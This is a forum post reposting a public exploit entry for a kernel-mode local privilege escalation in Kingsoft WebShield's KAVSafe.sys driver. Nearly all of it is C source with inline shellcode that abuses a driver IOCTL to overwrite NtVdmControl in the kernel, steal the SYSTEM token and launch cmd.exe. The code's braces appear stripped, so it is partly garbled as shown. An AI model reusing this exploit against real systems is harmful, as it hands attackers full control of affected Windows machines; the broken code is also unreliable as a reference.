Kingsoft WebShield KAVSafe.sys Kernel Mode Local Priv. Escalation

View previous topic View next topic Go down

Kingsoft WebShield KAVSafe.sys Kernel Mode Local Priv. Escalation

Post by Singlemature on 24/5/2010, 11:34

from:http://sebug.net/vulndb/19676/
#Title: Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Priv. Escalation
# EDB-ID: 12710
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Xuanyuan Smart
# Published: 2010-05-23
# Verified: no
# Download Exploit Code
# Download N/A

view sourceprint?Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability



VULNERABLE PRODUCTS

Kingsoft WebShield <= 3.5.1.2 (2010.5.23)



Signature Date: 2010-5-23 2:33:54



And



KAVSafe.sys <= 2010.4.14.609

Signature Dateļ¼š2010-4-14 13:42:26



DETAILS:

Kavsafe.sys create a device called \Device\KAVSafe , and handles DeviceIoControl request IoControlCode = 0x830020d4 , which can overwrite arbitrary kernel module data



EXPLOIT CODE:


code:
Code:

#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS) 

typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)( 

  HANDLE ProcessHandle, 

  DWORD ProcessInformationClass, 

  PVOID ProcessInformation, 

  ULONG ProcessInformationLength, 

  PULONG ReturnLength 

    ); 

 

typedef struct _STRING { 

    USHORT Length; 

    USHORT MaximumLength; 

    PCHAR Buffer; 

} STRING; 

typedef STRING *PSTRING; 

typedef struct _RTL_DRIVE_LETTER_CURDIR { 

    USHORT Flags; 

    USHORT Length; 

    ULONG TimeStamp; 

    STRING DosPath; 

} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 

typedef struct _UNICODE_STRING { 

    USHORT Length; 

    USHORT MaximumLength; 

    PWSTR  Buffer; 

} UNICODE_STRING; 

typedef UNICODE_STRING *PUNICODE_STRING; 

typedef const UNICODE_STRING *PCUNICODE_STRING; 

#define RTL_MAX_DRIVE_LETTERS 32 

#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 

typedef struct _CURDIR { 

    UNICODE_STRING DosPath; 

    HANDLE Handle; 

} CURDIR, *PCURDIR; 

typedef struct _RTL_USER_PROCESS_PARAMETERS { 

    ULONG MaximumLength; 

    ULONG Length; 

    ULONG Flags; 

    ULONG DebugFlags; 

    HANDLE ConsoleHandle; 

    ULONG  ConsoleFlags; 

    HANDLE StandardInput; 

    HANDLE StandardOutput; 

    HANDLE StandardError; 

    CURDIR CurrentDirectory;        // ProcessParameters 

    UNICODE_STRING DllPath;        // ProcessParameters 

    UNICODE_STRING ImagePathName;  // ProcessParameters 

    UNICODE_STRING CommandLine;    // ProcessParameters 

    PVOID Environment;              // NtAllocateVirtualMemory 

    ULONG StartingX; 

    ULONG StartingY; 

    ULONG CountX; 

    ULONG CountY; 

    ULONG CountCharsX; 

    ULONG CountCharsY; 

    ULONG FillAttribute; 

    ULONG WindowFlags; 

    ULONG ShowWindowFlags; 

    UNICODE_STRING WindowTitle;    // ProcessParameters 

    UNICODE_STRING DesktopInfo;    // ProcessParameters 

    UNICODE_STRING ShellInfo;      // ProcessParameters 

    UNICODE_STRING RuntimeData;    // ProcessParameters 

    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ]; 

} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 

typedef struct _PEB { 

    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the 

    BOOLEAN ReadImageFileExecOptions;  // 

    BOOLEAN BeingDebugged;              // 

    BOOLEAN SpareBool;                  // 

    HANDLE Mutant;                      // INITIAL_PEB structure is also updated. 

    PVOID ImageBaseAddress; 

    PVOID Ldr; 

    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters; 

} PEB, *PPEB; 

typedef LONG KPRIORITY; 

typedef struct _PROCESS_BASIC_INFORMATION { 

    LONG ExitStatus; 

    PVOID PebBaseAddress; 

    ULONG_PTR AffinityMask; 

    KPRIORITY BasePriority; 

    ULONG_PTR UniqueProcessId; 

    ULONG_PTR InheritedFromUniqueProcessId; 

} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; 

typedef struct { 

    ULONG  Unknown1; 

    ULONG  Unknown2; 

    PVOID  Base; 

    ULONG  Size; 

    ULONG  Flags; 

    USHORT  Index; 

    USHORT  NameLength; 

    USHORT  LoadCount; 

    USHORT  PathLength; 

    CHAR    ImageName[256]; 

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; 

 

typedef struct { 

    ULONG  Count; 

    SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; 

} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION; 

typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) ( 

  LONG SystemInformationClass, 

 PVOID SystemInformation, 

  ULONG SystemInformationLength, 

  PULONG ReturnLength 

    ); 

 

#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) 

typedef LONG (WINAPI *PNT_VDM_CONTROL) ( 

  ULONG Service, 

  PVOID ServiceData 

    ); 

VOID __declspec(naked) R0ShellCodeXP() 



__asm 



mov eax,0xffdff124 

mov eax,[eax] 

mov esi ,dword ptr[eax+0x220] 

mov eax,esi 

searchxp: 

mov eax,dword ptr[eax+0x88] 

sub eax,0x88 

mov edx,dword ptr[eax+0x84] 

cmp edx,4 

jnz searchxp 

mov eax,dword ptr[eax+0xc8] 

mov dword ptr[esi + 0xc8] , eax 

ret 8 





VOID NopNop() 



printf("nop!\n"); 



 

#include "malloc.h" 

int main(int argc, char* argv[]) 



 

printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"

"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"

"2010-5-23\n"

"By Lincoin \n\nPress Enter"); 

HKEY hkey ; 

WCHAR InstallPath[MAX_PATH]; 

DWORD datatype ; 

DWORD datasize = MAX_PATH * sizeof(WCHAR); 

ULONG oldlen ; 

PVOID pOldBufferData = NULL ; 

 

if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS) 



if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS) 



RegCloseKey(hkey); 

printf("KSWebShield not installed\n"); 

getchar(); 

return 0 ; 



 

RegCloseKey(hkey); 



else



printf("KSWebShield not installed\n"); 

getchar(); 

return 0 ; 



wcscat(InstallPath , L"\\kavinst.exe"); 

 

 

PROCESS_BASIC_INFORMATION pbi ; 

 

PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ; 

pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess"); 

pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL); 

 

PPEB peb ; 

 

peb = (PPEB)pbi.PebBaseAddress; 

oldlen = peb->ProcessParameters->ImagePathName.Length; 

peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR); 

pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length); 

RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length); 

RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length ); 

HANDLE hdev = CreateFile("\\\\.\\KAVSafe" , 

FILE_READ_ATTRIBUTES , 

FILE_SHARE_READ , 

0, 

OPEN_EXISTING , 

0, 

0); 

 

if (hdev==INVALID_HANDLE_VALUE) 



printf("cannot open device %u\n", GetLastError()); 

getchar(); 

return 0 ; 



RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length); 

peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ; 

 

PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ; 

pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation"); 

X_SYSTEM_MODULE_INFORMATION sysmod ; 

HMODULE KernelHandle ; 

 

pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL); 

    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1); 

if (KernelHandle == 0 ) 



printf("cannot load ntoskrnl!\n"); 

getchar(); 

return 0 ; 



PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl"); 

 

if (pNtVdmControl == 0 ) 



printf("cannot find NtVdmControl!\n"); 

getchar(); 

return 0 ; 



pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  ); 

 

printf("NtVdmControl = %08x" , pNtVdmControl ); 

getchar(); 

ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP; 

ULONG pShellCode = (ULONG)R0ShellCodeXP; 

 

 

PVOID Data = malloc(0x48 + ShellCodeSize); 

 

CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize); 

CHAR ModuleName[68]= "ntoskrnl.exe" ; 

RtlCopyMemory( Data , ModuleName , sizeof(ModuleName)); 

*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl; 

*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ; 

ULONG btr ; 

if (!DeviceIoControl(hdev , 

IOCTL_HOTPATCH_KERNEL_MODULE , 

Data , 

0x48 + ShellCodeSize , 

NULL , 

0, 

&btr , 0 

)) 



printf("cannot device io control!%u\n" , GetLastError()); 

getchar(); 

return 0; 



 

CloseHandle(hdev); 

 

PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl"); 

pR3NtVdmControl(0,0); 

WinExec("cmd.exe" , SW_SHOW); 

printf("OK!\n "); 

 

getchar(); 

 

return 0; 

}

ps:i have no idea what's all this about...just post it maybe you guys would interested

Singlemature
Valued Member
Valued Member

Posts : 31
Join date : 2010-04-22

View user profile

Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum